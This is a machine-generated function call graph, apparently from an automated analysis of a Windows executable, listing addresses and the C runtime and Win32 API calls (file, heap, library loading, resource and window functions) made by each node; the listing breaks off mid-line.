82d9d5 140874->140880 140875->140820 140879 828a05 __calloc_crt 58 API calls 140876->140879 140876->140880 140883 82d8f4 140876->140883 140877 82da9d 140970 82daad LeaveCriticalSection _doexit 140877->140970 140879->140876 140880->140877 140881 82da22 GetStdHandle 140880->140881 140882 82da35 GetFileType 140880->140882 140969 82a05b InitializeCriticalSectionAndSpinCount 140880->140969 140881->140880 140882->140880 140883->140880 140884 82d928 GetFileType 140883->140884 140968 82a05b InitializeCriticalSectionAndSpinCount 140883->140968 140884->140883 140888 835164 140887->140888 140889 827f33 140887->140889 141010 828a4d 58 API calls 2 library calls 140888->141010 140893 834d4b GetModuleFileNameW 140889->140893 140891 83518a _memmove 140892 8351a0 FreeEnvironmentStringsW 140891->140892 140892->140889 140894 834d7f _wparse_cmdline 140893->140894 140896 834dbf _wparse_cmdline 140894->140896 141011 828a4d 58 API calls 2 library calls 140894->141011 140896->140827 140898 834fa1 __NMSG_WRITE 140897->140898 140902 834f99 140897->140902 140899 828a05 __calloc_crt 58 API calls 140898->140899 140907 834fca __NMSG_WRITE 140899->140907 140900 835021 140901 822f85 _free 58 API calls 140900->140901 140901->140902 140902->140831 140903 828a05 __calloc_crt 58 API calls 140903->140907 140904 835046 140905 822f85 _free 58 API calls 140904->140905 140905->140902 140907->140900 140907->140902 140907->140903 140907->140904 140908 83505d 140907->140908 141012 834837 58 API calls __wsplitpath_helper 140907->141012 141013 828ff6 IsProcessorFeaturePresent 140908->141013 140910 835069 140910->140831 140912 82332b __IsNonwritableInCurrentImage 140911->140912 141036 82a701 140912->141036 140914 823349 __initterm_e 140916 823368 _doexit __IsNonwritableInCurrentImage 140914->140916 141039 822f70 140914->141039 140916->140835 140918 815fa5 140917->140918 140928 816044 140917->140928 140919 815fdf IsThemeActive 140918->140919 141074 82359c 140919->141074 140923 81600b 141086 815f00 SystemParametersInfoW SystemParametersInfoW 140923->141086 140925 816017 141087 815240 140925->141087 140927 81601f SystemParametersInfoW 140927->140928 140928->140839 140929->140813 140930->140818 140931->140824 140935->140840 140936->140843 140937->140849 140938->140851 140939->140855 140940->140856 140943 828a0c 140941->140943 140944 828a47 140943->140944 140945 828a2a 140943->140945 140950 835426 140943->140950 140944->140860 140947 82a016 TlsSetValue 140944->140947 140945->140943 140945->140944 140958 82a362 Sleep 140945->140958 140947->140863 140948->140867 140949->140864 140951 835431 140950->140951 140952 83544c 140950->140952 140951->140952 140953 83543d 140951->140953 140955 83545c HeapAlloc 140952->140955 140956 835442 140952->140956 140960 8235d1 DecodePointer 140952->140960 140959 828d58 58 API calls __getptd_noexit 140953->140959 140955->140952 140955->140956 140956->140943 140958->140945 140959->140956 140960->140952 140962 829e5f EnterCriticalSection 140961->140962 140963 829e4c 140961->140963 140962->140871 140971 829ec3 140963->140971 140965 829e52 140965->140962 140995 8232e5 58 API calls 3 library calls 140965->140995 140968->140883 140969->140880 140970->140875 140972 829ecf __ioinit 140971->140972 140973 829ef0 140972->140973 140974 829ed8 140972->140974 140982 829f11 __ioinit 140973->140982 140999 828a4d 58 API calls 2 library calls 140973->140999 140996 82a39b 58 API calls __NMSG_WRITE 140974->140996 140977 829edd 140997 82a3f8 58 API calls 5 library calls 140977->140997 140978 829f05 140980 829f1b 140978->140980 140981 829f0c 140978->140981 140985 829e3b __lock 58 API calls 140980->140985 141000 828d58 58 API calls __getptd_noexit 140981->141000 140982->140965 140983 829ee4 140998 8232cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 140983->140998 140987 829f22 140985->140987 140989 829f47 140987->140989 140990 829f2f 140987->140990 141002 822f85 140989->141002 141001 82a05b InitializeCriticalSectionAndSpinCount 140990->141001 140993 829f3b 141008 829f63 LeaveCriticalSection _doexit 140993->141008 140996->140977 140997->140983 140999->140978 141000->140982 141001->140993 141003 822fb7 __dosmaperr 141002->141003 141004 822f8e RtlFreeHeap 141002->141004 141003->140993 141004->141003 141005 822fa3 141004->141005 141009 828d58 58 API calls __getptd_noexit 141005->141009 141007 822fa9 GetLastError 141007->141003 141008->140982 141009->141007 141010->140891 141011->140896 141012->140907 141014 829001 141013->141014 141019 828e89 141014->141019 141018 82901c 141018->140910 141020 828ea3 _memset __call_reportfault 141019->141020 141021 828ec3 IsDebuggerPresent 141020->141021 141027 82a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 141021->141027 141024 828f87 __call_reportfault 141028 82c826 141024->141028 141025 828faa 141026 82a370 GetCurrentProcess TerminateProcess 141025->141026 141026->141018 141027->141024 141029 82c830 IsProcessorFeaturePresent 141028->141029 141030 82c82e 141028->141030 141032 835b3a 141029->141032 141030->141025 141035 835ae9 5 API calls 2 library calls 141032->141035 141034 835c1d 141034->141025 141035->141034 141037 82a704 EncodePointer 141036->141037 141037->141037 141038 82a71e 141037->141038 141038->140914 141042 822e74 141039->141042 141041 822f7b 141041->140916 141043 822e80 __ioinit 141042->141043 141050 823447 141043->141050 141049 822ea7 __ioinit 141049->141041 141051 829e3b __lock 58 API calls 141050->141051 141052 822e89 141051->141052 141053 822eb8 DecodePointer DecodePointer 141052->141053 141054 822e95 141053->141054 141055 822ee5 141053->141055 141064 822eb2 141054->141064 141055->141054 141067 8289d4 59 API calls __wsplitpath_helper 141055->141067 141057 822f48 EncodePointer EncodePointer 141057->141054 141058 822ef7 141058->141057 141059 822f1c 141058->141059 141068 828a94 61 API calls 2 library calls 141058->141068 141059->141054 141062 822f36 EncodePointer 141059->141062 141069 828a94 61 API calls 2 library calls 141059->141069 141062->141057 141063 822f30 141063->141054 141063->141062 141070 823450 141064->141070 141067->141058 141068->141059 141069->141063 141073 829fa5 LeaveCriticalSection 141070->141073 141072 822eb7 141072->141049 141073->141072 141075 829e3b __lock 58 API calls 141074->141075 141076 8235a7 DecodePointer EncodePointer 141075->141076 141139 829fa5 LeaveCriticalSection 141076->141139 141078 816004 141079 823604 141078->141079 141080 823628 141079->141080 141081 82360e 141079->141081 141080->140923 141081->141080 141140 828d58 58 API calls __getptd_noexit 141081->141140 141083 823618 141141 828fe6 9 API calls __wsplitpath_helper 141083->141141 141085 823623 141085->140923 141086->140925 141088 81524d __write_nolock 141087->141088 141142 811207 141088->141142 141092 81527e IsDebuggerPresent 141093 850b21 MessageBoxA 141092->141093 141094 81528c 141092->141094 141096 850b39 141093->141096 141095 8152a0 141094->141095 141094->141096 141215 8131bf 141095->141215 141343 81314d 59 API calls Mailbox 141096->141343 141099 850b49 141106 850b5f SetCurrentDirectoryW 141099->141106 141104 81536c Mailbox 141104->140927 141106->141104 141139->141078 141140->141083 141141->141085 141372 820fe6 141142->141372 141144 811228 141145 820fe6 Mailbox 59 API calls 141144->141145 141146 811236 GetCurrentDirectoryW 141145->141146 141147 814ec8 141146->141147 141148 811207 59 API calls 141147->141148 141149 814ede 141148->141149 141410 815420 141149->141410 141151 814efc 141424 8119e1 141151->141424 141153 814f10 141428 811c9c 141153->141428 141158 811a36 59 API calls 141159 814f34 141158->141159 141435 8039be 141159->141435 141161 814f44 Mailbox 141162 811a36 59 API calls 141161->141162 141163 814f68 141162->141163 141164 8039be 68 API calls 141163->141164 141165 814f77 Mailbox 141164->141165 141166 811207 59 API calls 141165->141166 141167 814f94 141166->141167 141439 8155bc 141167->141439 141171 814fae 141172 850a54 141171->141172 141173 814fb8 141171->141173 141174 8155bc 59 API calls 141172->141174 141175 82312d _W_store_winword 60 API calls 141173->141175 141176 850a68 141174->141176 141177 814fc3 141175->141177 141179 8155bc 59 API calls 141176->141179 141177->141176 141178 814fcd 141177->141178 141180 82312d _W_store_winword 60 API calls 141178->141180 141181 850a84 141179->141181 141182 814fd8 141180->141182 141184 8200cf 61 API calls 141181->141184 141182->141181 141183 814fe2 141182->141183 141185 82312d _W_store_winword 60 API calls 141183->141185 141186 850aa7 141184->141186 141187 814fed 141185->141187 141188 8155bc 59 API calls 141186->141188 141189 814ff7 141187->141189 141190 850ad0 141187->141190 141191 850ab3 141188->141191 141192 81501b 141189->141192 141195 811c9c 59 API calls 141189->141195 141193 8155bc 59 API calls 141190->141193 141194 811c9c 59 API calls 141191->141194 141455 8047be 141192->141455 141196 850aee 141193->141196 141197 850ac1 141194->141197 141198 81500e 141195->141198 141200 811c9c 59 API calls 141196->141200 141201 8155bc 59 API calls 141197->141201 141202 8155bc 59 API calls 141198->141202 141204 850afc 141200->141204 141201->141190 141202->141192 141206 8155bc 59 API calls 141204->141206 141208 850b0b 141206->141208 141208->141208 141210 80477a 59 API calls 141212 815055 141210->141212 141211 8043d0 59 API calls 141211->141212 141212->141210 141212->141211 141213 8155bc 59 API calls 141212->141213 141214 81509b Mailbox 141212->141214 141213->141212 141214->141092 141216 8131cc __write_nolock 141215->141216 141217 850314 _memset 141216->141217 141218 8131e5 141216->141218 141221 850330 GetOpenFileNameW 141217->141221 141505 820284 141218->141505 141223 85037f 141221->141223 141225 811821 59 API calls 141223->141225 141227 850394 141225->141227 141227->141227 141228 813203 141533 81278a 141228->141533 141343->141099 141375 820fee 141372->141375 141374 821008 141374->141144 141375->141374 141377 82100c std::exception::exception 141375->141377 141382 82593c 141375->141382 141399 8235d1 DecodePointer 141375->141399 141400 8287cb RaiseException 141377->141400 141379 821036 141401 828701 58 API calls _free 141379->141401 141381 821048 141381->141144 141383 8259b7 141382->141383 141393 825948 141382->141393 141408 8235d1 DecodePointer 141383->141408 141385 8259bd 141409 828d58 58 API calls __getptd_noexit 141385->141409 141388 82597b RtlAllocateHeap 141389 8259af 141388->141389 141388->141393 141389->141375 141391 825953 141391->141393 141402 82a39b 58 API calls __NMSG_WRITE 141391->141402 141403 82a3f8 58 API calls 5 library calls 141391->141403 141404 8232cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 141391->141404 141392 8259a3 141406 828d58 58 API calls __getptd_noexit 141392->141406 141393->141388 141393->141391 141393->141392 141397 8259a1 141393->141397 141405 8235d1 DecodePointer 141393->141405 141407 828d58 58 API calls __getptd_noexit 141397->141407 141399->141375 141400->141379 141401->141381 141402->141391 141403->141391 141405->141393 141406->141397 141407->141389 141408->141385 141409->141389 141411 81542d __write_nolock 141410->141411 141412 811821 59 API calls 141411->141412 141416 815590 Mailbox 141411->141416 141414 81545f 141412->141414 141422 815495 Mailbox 141414->141422 141475 811609 141414->141475 141415 815563 141415->141416 141417 811a36 59 API calls 141415->141417 141416->141151 141418 815584 141417->141418 141421 814c94 59 API calls 141418->141421 141419 811a36 59 API calls 141419->141422 141420 811609 59 API calls 141420->141422 141421->141416 141422->141415 141422->141416 141422->141419 141422->141420 141478 814c94 141422->141478 141425 8119fb 141424->141425 141427 8119ee 141424->141427 141426 820fe6 Mailbox 59 API calls 141425->141426 141426->141427 141427->141153 141429 811ca7 141428->141429 141430 811caf 141428->141430 141488 811bcc 59 API calls 2 library calls 141429->141488 141432 80477a 141430->141432 141433 820fe6 Mailbox 59 API calls 141432->141433 141434 804787 141433->141434 141434->141158 141436 8039c9 141435->141436 141437 8039f0 141436->141437 141489 803ea3 68 API calls Mailbox 141436->141489 141437->141161 141440 8155c6 141439->141440 141441 8155df 141439->141441 141442 811c9c 59 API calls 141440->141442 141443 811821 59 API calls 141441->141443 141444 814fa0 141442->141444 141443->141444 141445 82312d 141444->141445 141446 823139 141445->141446 141447 8231ae 141445->141447 141454 82315e 141446->141454 141490 828d58 58 API calls __getptd_noexit 141446->141490 141492 8231c0 60 API calls 3 library calls 141447->141492 141450 8231bb 141450->141171 141451 823145 141491 828fe6 9 API calls __wsplitpath_helper 141451->141491 141453 823150 141453->141171 141454->141171 141456 8047c6 141455->141456 141457 820fe6 Mailbox 59 API calls 141456->141457 141458 8047d4 141457->141458 141459 8047e0 141458->141459 141493 8046ec 59 API calls Mailbox 141458->141493 141461 804540 141459->141461 141494 804650 141461->141494 141463 80454f 141464 820fe6 Mailbox 59 API calls 141463->141464 141465 8045eb 141463->141465 141464->141465 141466 8043d0 141465->141466 141467 83d6c9 141466->141467 141472 8043e7 141466->141472 141467->141472 141504 8040cb 59 API calls Mailbox 141467->141504 141469 804530 141503 80523c 59 API calls 141469->141503 141470 8044e8 141473 820fe6 Mailbox 59 API calls 141470->141473 141472->141469 141472->141470 141474 8044ef 141472->141474 141473->141474 141474->141212 141484 811aa4 141475->141484 141477 811614 141477->141414 141479 814ca2 141478->141479 141483 814cc4 _memmove 141478->141483 141481 820fe6 Mailbox 59 API calls 141479->141481 141480 820fe6 Mailbox 59 API calls 141482 814cd8 141480->141482 141481->141483 141482->141422 141483->141480 141485 811ab7 141484->141485 141487 811ab4 _memmove 141484->141487 141486 820fe6 Mailbox 59 API calls 141485->141486 141486->141487 141487->141477 141488->141430 141489->141437 141490->141451 141491->141453 141492->141450 141493->141459 141495 804659 Mailbox 141494->141495 141496 83d6ec 141495->141496 141501 804663 141495->141501 141497 820fe6 Mailbox 59 API calls 141496->141497 141500 83d6f8 141497->141500 141498 80466a 141498->141463 141500->141500 141501->141498 141502 805190 59 API calls Mailbox 141501->141502 141502->141501 141503->141474 141504->141472 141567 831b70 141505->141567 141508 8202b0 141510 811821 59 API calls 141508->141510 141509 8202cd 141511 8119e1 59 API calls 141509->141511 141512 8202bc 141510->141512 141511->141512 141569 81133d 141512->141569 141515 8209c5 141516 831b70 __write_nolock 141515->141516 141517 8209d2 GetLongPathNameW 141516->141517 141518 811821 59 API calls 141517->141518 141519 8131f7 141518->141519 141520 812f3d 141519->141520 141521 811207 59 API calls 141520->141521 141522 812f4f 141521->141522 141523 820284 60 API calls 141522->141523 141524 812f5a 141523->141524 141525 850177 141524->141525 141526 812f65 141524->141526 141531 850191 141525->141531 141583 81151f 61 API calls 141525->141583 141527 814c94 59 API calls 141526->141527 141529 812f71 141527->141529 141577 801307 141529->141577 141532 812f84 Mailbox 141532->141228 141584 8149c2 141533->141584 141536 84f8d6 141700 869b16 141536->141700 141538 8149c2 136 API calls 141540 8127c3 141538->141540 141540->141536 141543 8127cb 141540->141543 141541 84f908 141545 820fe6 Mailbox 59 API calls 141541->141545 141542 84f8eb 141749 814a2f 141542->141749 141546 8127d7 141543->141546 141547 84f8f3 141543->141547 141564 84f94d Mailbox 141545->141564 141608 8129be 141546->141608 141755 8647e8 90 API calls _wprintf 141547->141755 141551 84f901 141551->141541 141552 84fb01 141553 822f85 _free 58 API calls 141552->141553 141554 84fb09 141553->141554 141555 814a2f 84 API calls 141554->141555 141560 84fb12 141555->141560 141559 822f85 _free 58 API calls 141559->141560 141560->141559 141561 814a2f 84 API calls 141560->141561 141759 85ff5c 89 API calls 4 library calls 141560->141759 141561->141560 141563 811a36 59 API calls 141563->141564 141564->141552 141564->141560 141564->141563 141735 81343f 141564->141735 141743 813297 141564->141743 141756 85fef8 59 API calls 2 library calls 141564->141756 141757 85fe19 61 API calls 2 library calls 141564->141757 141758 86793a 59 API calls Mailbox 141564->141758 141568 820291 GetFullPathNameW 141567->141568 141568->141508 141568->141509 141570 81134b 141569->141570 141573 811981 141570->141573 141572 81135b 141572->141515 141574 81198f 141573->141574 141576 811998 _memmove 141573->141576 141575 811aa4 59 API calls 141574->141575 141574->141576 141575->141576 141576->141572 141578 801319 141577->141578 141582 801338 _memmove 141577->141582 141580 820fe6 Mailbox 59 API calls 141578->141580 141579 820fe6 Mailbox 59 API calls 141581 80134f 141579->141581 141580->141582 141581->141532 141582->141579 141583->141525 141760 814b29 141584->141760 141589 8149ed LoadLibraryExW 141770 814ade 141589->141770 141590 8508bb 141592 814a2f 84 API calls 141590->141592 141594 8508c2 141592->141594 141596 814ade 3 API calls 141594->141596 141598 8508ca 141596->141598 141597 814a14 141597->141598 141599 814a20 141597->141599 141796 814ab2 141598->141796 141601 814a2f 84 API calls 141599->141601 141603 8127af 141601->141603 141603->141536 141603->141538 141605 8508f1 141804 814a6e 141605->141804 141607 8508fe 141609 84fd14 141608->141609 141610 8129e7 141608->141610 142181 85ff5c 89 API calls 4 library calls 141609->142181 142164 813df7 60 API calls Mailbox 141610->142164 141613 84fd27 142182 85ff5c 89 API calls 4 library calls 141613->142182 141614 812a09 142165 813e47 67 API calls 141614->142165 141616 812a1e 141616->141613 141617 812a26 141616->141617 141619 811207 59 API calls 141617->141619 141621 812a32 141619->141621 141620 84fd43 141623 812a93 141620->141623 141625 812aa1 141623->141625 141626 84fd56 141623->141626 141701 814a8c 85 API calls 141700->141701 141702 869b85 141701->141702 142193 869cf1 141702->142193 141705 814ab2 74 API calls 141706 869bb4 141705->141706 141707 814ab2 74 API calls 141706->141707 141708 869bc4 141707->141708 141709 814ab2 74 API calls 141708->141709 141710 869bdf 141709->141710 141733 84f8e7 141733->141541 141733->141542 141736 8134df 141735->141736 141740 813452 _memmove 141735->141740 141738 820fe6 Mailbox 59 API calls 141736->141738 141737 820fe6 Mailbox 59 API calls 141739 813459 141737->141739 141738->141740 141740->141737 141744 8132aa 141743->141744 141746 813358 141743->141746 141745 820fe6 Mailbox 59 API calls 141744->141745 141748 8132dc 141744->141748 141745->141748 141746->141564 141748->141746 141750 814a40 141749->141750 141751 814a39 141749->141751 141753 814a60 FreeLibrary 141750->141753 141754 814a4f 141750->141754 142200 8255c6 141751->142200 141753->141754 141754->141547 141755->141551 141756->141564 141757->141564 141758->141564 141759->141560 141809 814b77 141760->141809 141763 814b50 141765 814b60 FreeLibrary 141763->141765 141766 8149d4 141763->141766 141764 814b77 2 API calls 141764->141763 141765->141766 141767 82547b 141766->141767 141813 825490 141767->141813 141769 8149e1 141769->141589 141769->141590 141894 814baa 141770->141894 141773 814b03 141775 814b15 FreeLibrary 141773->141775 141776 814a05 141773->141776 141774 814baa 2 API calls 141774->141773 141775->141776 141777 8148b0 141776->141777 141778 820fe6 Mailbox 59 API calls 141777->141778 141779 8148c5 141778->141779 141898 81433f 141779->141898 141781 8148d1 _memmove 141782 81490c 141781->141782 141783 85080a 141781->141783 141785 814a6e 69 API calls 141782->141785 141784 850817 141783->141784 141906 869ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 141783->141906 141907 869f5e 95 API calls 141784->141907 141790 814915 141785->141790 141788 814ab2 74 API calls 141788->141790 141789 850859 141901 814a8c 141789->141901 141790->141788 141790->141789 141793 814a8c 85 API calls 141790->141793 141795 8149a0 141790->141795 141793->141790 141794 814ab2 74 API calls 141794->141795 141795->141597 141797 814ac4 141796->141797 141799 850945 141796->141799 142013 825802 141797->142013 141801 8696c4 142138 86951a 141801->142138 141803 8696da 141803->141605 141805 814a7d 141804->141805 141806 850908 141804->141806 142143 825e80 141805->142143 141808 814a85 141808->141607 141810 814b44 141809->141810 141811 814b80 LoadLibraryA 141809->141811 141810->141763 141810->141764 141811->141810 141812 814b91 GetProcAddress 141811->141812 141812->141810 141816 82549c __ioinit 141813->141816 141814 8254af 141862 828d58 58 API calls __getptd_noexit 141814->141862 141816->141814 141818 8254e0 141816->141818 141817 8254b4 141863 828fe6 9 API calls __wsplitpath_helper 141817->141863 141832 830718 141818->141832 141821 8254e5 141822 8254fb 141821->141822 141823 8254ee 141821->141823 141825 825525 141822->141825 141826 825505 141822->141826 141864 828d58 58 API calls __getptd_noexit 141823->141864 141847 830837 141825->141847 141865 828d58 58 API calls __getptd_noexit 141826->141865 141829 8254bf __ioinit @_EH4_CallFilterFunc@8 141829->141769 141833 830724 __ioinit 141832->141833 141834 829e3b __lock 58 API calls 141833->141834 141845 830732 141834->141845 141835 8307ad 141872 828a4d 58 API calls 2 library calls 141835->141872 141836 8307a6 141867 83082e 141836->141867 141839 8307b4 141839->141836 141873 82a05b InitializeCriticalSectionAndSpinCount 141839->141873 141840 830823 __ioinit 141840->141821 141842 829ec3 __mtinitlocknum 58 API calls 141842->141845 141844 8307da EnterCriticalSection 141844->141836 141845->141835 141845->141836 141845->141842 141870 826e7d 59 API calls __lock 141845->141870 141871 826ee7 LeaveCriticalSection LeaveCriticalSection _doexit 141845->141871 141848 830857 __wopenfile 141847->141848 141849 830871 141848->141849 141861 830a2c 141848->141861 141880 8239fb 60 API calls 2 library calls 141848->141880 141878 828d58 58 API calls __getptd_noexit 141849->141878 141851 830876 141879 828fe6 9 API calls __wsplitpath_helper 141851->141879 141853 830a8f 141875 8387d1 141853->141875 141854 825530 141866 825552 LeaveCriticalSection LeaveCriticalSection __wfsopen 141854->141866 141857 830a25 141857->141861 141881 8239fb 60 API calls 2 library calls 141857->141881 141859 830a44 141859->141861 141882 8239fb 60 API calls 2 library calls 141859->141882 141861->141849 141861->141853 141862->141817 141863->141829 141864->141829 141865->141829 141866->141829 141874 829fa5 LeaveCriticalSection 141867->141874 141869 830835 141869->141840 141870->141845 141871->141845 141872->141839 141873->141844 141874->141869 141883 837fb5 141875->141883 141877 8387ea 141877->141854 141878->141851 141879->141854 141880->141857 141881->141859 141882->141861 141885 837fc1 __ioinit 141883->141885 141884 837fd7 141886 828d58 __wsplitpath_helper 58 API calls 141884->141886 141885->141884 141888 83800d 141885->141888 141887 837fdc 141886->141887 141889 828fe6 __wsplitpath_helper 9 API calls 141887->141889 141890 83807e __wsopen_nolock 109 API calls 141888->141890 141892 837fe6 __ioinit 141889->141892 141891 838029 141890->141891 141893 838052 __wsopen_helper LeaveCriticalSection 141891->141893 141892->141877 141893->141892 141895 814af7 141894->141895 141896 814bb3 LoadLibraryA 141894->141896 141895->141773 141895->141774 141896->141895 141897 814bc4 GetProcAddress 141896->141897 141897->141895 141899 820fe6 Mailbox 59 API calls 141898->141899 141900 814351 141899->141900 141900->141781 141902 814a9b 141901->141902 141905 850923 141901->141905 141908 825a6d 141902->141908 141904 814aa9 141904->141794 141906->141784 141907->141790 141912 825a79 __ioinit 141908->141912 141909 825a8b 141939 828d58 58 API calls __getptd_noexit 141909->141939 141911 825ab1 141921 826e3e 141911->141921 141912->141909 141912->141911 141913 825a90 141940 828fe6 9 API calls __wsplitpath_helper 141913->141940 141919 825a9b __ioinit 141919->141904 141922 826e70 EnterCriticalSection 141921->141922 141923 826e4e 141921->141923 141925 825ab7 141922->141925 141923->141922 141924 826e56 141923->141924 141926 829e3b __lock 58 API calls 141924->141926 141927 8259de 141925->141927 141926->141925 141928 8259fc 141927->141928 141929 8259ec 141927->141929 141931 825a12 141928->141931 141942 825af0 141928->141942 142012 828d58 58 API calls __getptd_noexit 141929->142012 141971 824c5d 141931->141971 141936 825a53 141984 83185f 141936->141984 141938 8259f1 141941 825ae8 LeaveCriticalSection LeaveCriticalSection __wfsopen 141938->141941 141939->141913 141940->141919 141941->141919 141943 825afd __write_nolock 141942->141943 141944 825b15 141943->141944 141945 825b2d 141943->141945 141946 828d58 __wsplitpath_helper 58 API calls 141944->141946 141947 824906 __fputwc_nolock 58 API calls 141945->141947 141948 825b1a 141946->141948 141949 825b35 141947->141949 141950 828fe6 __wsplitpath_helper 9 API calls 141948->141950 141952 83185f __write 64 API calls 141949->141952 141953 825b51 141952->141953 141972 824c70 141971->141972 141976 824c94 141971->141976 141973 824906 __fputwc_nolock 58 API calls 141972->141973 141972->141976 141974 824c8d 141973->141974 141975 82dab6 __write 78 API calls 141974->141975 141975->141976 141977 824906 141976->141977 141978 824910 141977->141978 141979 824925 141977->141979 141980 828d58 __wsplitpath_helper 58 API calls 141978->141980 141979->141936 142012->141938 142016 82581d 142013->142016 142015 814ad5 142015->141801 142017 825829 __ioinit 142016->142017 142018 82586c 142017->142018 142019 82583f _memset 142017->142019 142028 825864 __ioinit 142017->142028 142020 826e3e __lock_file 59 API calls 142018->142020 142043 828d58 58 API calls __getptd_noexit 142019->142043 142022 825872 142020->142022 142029 82563d 142022->142029 142023 825859 142044 828fe6 9 API calls __wsplitpath_helper 142023->142044 142028->142015 142033 825658 _memset 142029->142033 142035 825673 142029->142035 142030 825663 142134 828d58 58 API calls __getptd_noexit 142030->142134 142032 825668 142135 828fe6 9 API calls __wsplitpath_helper 142032->142135 142033->142030 142033->142035 142038 8256b3 142033->142038 142045 8258a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 142035->142045 142037 8257c4 _memset 142137 828d58 58 API calls __getptd_noexit 142037->142137 142038->142035 142038->142037 142039 824906 __fputwc_nolock 58 API calls 142038->142039 142046 83108b 142038->142046 142114 830dd7 142038->142114 142136 830ef8 58 API calls 3 library calls 142038->142136 142039->142038 142043->142023 142044->142028 142045->142028 142047 8310c3 142046->142047 142048 8310ac 142046->142048 142050 8317fb 142047->142050 142054 8310fd 142047->142054 142049 828d24 __write_nolock 58 API calls 142048->142049 142051 8310b1 142049->142051 142052 828d24 __write_nolock 58 API calls 142050->142052 142053 828d58 __wsplitpath_helper 58 API calls 142051->142053 142055 831800 142052->142055 142094 8310b8 142053->142094 142056 831105 142054->142056 142063 83111c 142054->142063 142057 828d58 __wsplitpath_helper 58 API calls 142055->142057 142059 828d24 __write_nolock 58 API calls 142056->142059 142058 831111 142057->142058 142061 828fe6 __wsplitpath_helper 9 API calls 142058->142061 142060 83110a 142059->142060 142066 828d58 __wsplitpath_helper 58 API calls 142060->142066 142061->142094 142062 831131 142064 828d24 __write_nolock 58 API calls 142062->142064 142063->142062 142065 83114b 142063->142065 142067 831169 142063->142067 142063->142094 142064->142060 142065->142062 142071 831156 142065->142071 142066->142058 142068 828a4d __malloc_crt 58 API calls 142067->142068 142069 831179 142068->142069 142072 831181 142069->142072 142073 83119c 142069->142073 142070 835e9b __write_nolock 58 API calls 142074 83126a 142070->142074 142071->142070 142075 828d58 __wsplitpath_helper 58 API calls 142072->142075 142077 831af1 __lseeki64_nolock 60 API calls 142073->142077 142076 8312e3 ReadFile 142074->142076 142081 831280 GetConsoleMode 142074->142081 142078 831186 142075->142078 142079 8317c3 GetLastError 142076->142079 142080 831305 142076->142080 142077->142071 142082 828d24 __write_nolock 58 API calls 142078->142082 142083 8317d0 142079->142083 142084 8312c3 142079->142084 142080->142079 142088 8312d5 142080->142088 142085 8312e0 142081->142085 142086 831294 142081->142086 142082->142094 142087 828d58 __wsplitpath_helper 58 API calls 142083->142087 142092 828d37 __dosmaperr 58 API calls 142084->142092 142096 8312c9 142084->142096 142085->142076 142086->142085 142089 83129a ReadConsoleW 142086->142089 142090 8317d5 142087->142090 142088->142096 142097 83133a 142088->142097 142107 8315a7 142088->142107 142089->142088 142091 8312bd GetLastError 142089->142091 142093 828d24 __write_nolock 58 API calls 142090->142093 142091->142084 142092->142096 142093->142096 142094->142038 142095 822f85 _free 58 API calls 142095->142094 142096->142094 142096->142095 142098 8313a6 ReadFile 142097->142098 142104 831427 142097->142104 142101 8313c7 GetLastError 142098->142101 142105 8313d1 142098->142105 142100 8316ad ReadFile 142108 8316d0 GetLastError 142100->142108 142113 8316de 142100->142113 142101->142105 142102 8314e4 142109 831af1 __lseeki64_nolock 60 API calls 142102->142109 142110 831494 MultiByteToWideChar 142102->142110 142103 8314d4 142106 828d58 __wsplitpath_helper 58 API calls 142103->142106 142104->142096 142104->142102 142104->142103 142104->142110 142105->142097 142111 831af1 __lseeki64_nolock 60 API calls 142105->142111 142106->142096 142107->142096 142107->142100 142108->142113 142109->142110 142110->142091 142110->142096 142111->142105 142112 831af1 __lseeki64_nolock 60 API calls 142112->142113 142113->142107 142113->142112 142115 830de2 142114->142115 142118 830df7 142114->142118 142116 828d58 __wsplitpath_helper 58 API calls 142115->142116 142117 830de7 142116->142117 142119 828fe6 __wsplitpath_helper 9 API calls 142117->142119 142120 830e2c 142118->142120 142121 836214 __getbuf 58 API calls 142118->142121 142125 830df2 142118->142125 142119->142125 142122 824906 __fputwc_nolock 58 API calls 142120->142122 142121->142120 142123 830e40 142122->142123 142124 830f77 __read 72 API calls 142123->142124 142126 830e47 142124->142126 142125->142038 142126->142125 142127 824906 __fputwc_nolock 58 API calls 142126->142127 142128 830e6a 142127->142128 142128->142125 142129 824906 __fputwc_nolock 58 API calls 142128->142129 142130 830e76 142129->142130 142130->142125 142131 824906 __fputwc_nolock 58 API calls 142130->142131 142132 830e83 142131->142132 142133 824906 __fputwc_nolock 58 API calls 142132->142133 142133->142125 142134->142032 142135->142035 142136->142038 142137->142032 142141 82542a GetSystemTimeAsFileTime 142138->142141 142140 869529 142140->141803 142142 825458 __aulldiv 142141->142142 142142->142140 142144 825e8c __ioinit 142143->142144 142145 825eb3 142144->142145 142146 825e9e 142144->142146 142148 826e3e __lock_file 59 API calls 142145->142148 142156 828d58 58 API calls __getptd_noexit 142146->142156 142150 825eb9 142148->142150 142149 825ea3 142157 828fe6 9 API calls __wsplitpath_helper 142149->142157 142152 825af0 __ftell_nolock 67 API calls 142150->142152 142153 825ec4 142152->142153 142158 825ee4 LeaveCriticalSection LeaveCriticalSection __wfsopen 142153->142158 142155 825eae __ioinit 142155->141808 142156->142149 142157->142155 142158->142155 142164->141614 142165->141616 142181->141613 142182->141620 142198 869d05 __tzset_nolock _wcscmp 142193->142198 142194 814ab2 74 API calls 142194->142198 142195 869b99 142195->141705 142195->141733 142196 8696c4 GetSystemTimeAsFileTime 142196->142198 142197 814a8c 85 API calls 142197->142198 142198->142194 142198->142195 142198->142196 142198->142197 142622 814d83 142623 814dba 142622->142623 142624 814e37 142623->142624 142625 814dd8 142623->142625 142662 814e35 142623->142662 142627 8509c2 142624->142627 142628 814e3d 142624->142628 142629 814de5 142625->142629 142630 814ead PostQuitMessage 142625->142630 142626 814e1a DefWindowProcW 142664 814e28 142626->142664 142672 80c460 10 API calls Mailbox 142627->142672 142632 814e42 142628->142632 142633 814e65 SetTimer RegisterWindowMessageW 142628->142633 142634 850a35 142629->142634 142635 814df0 142629->142635 142630->142664 142638 850965 142632->142638 142639 814e49 KillTimer 142632->142639 142640 814e8e CreatePopupMenu 142633->142640 142633->142664 142677 862cce 97 API calls _memset 142634->142677 142641 814eb7 142635->142641 142642 814df8 142635->142642 142637 8509e9 142673 80c483 317 API calls Mailbox 142637->142673 142648 85099e MoveWindow 142638->142648 142649 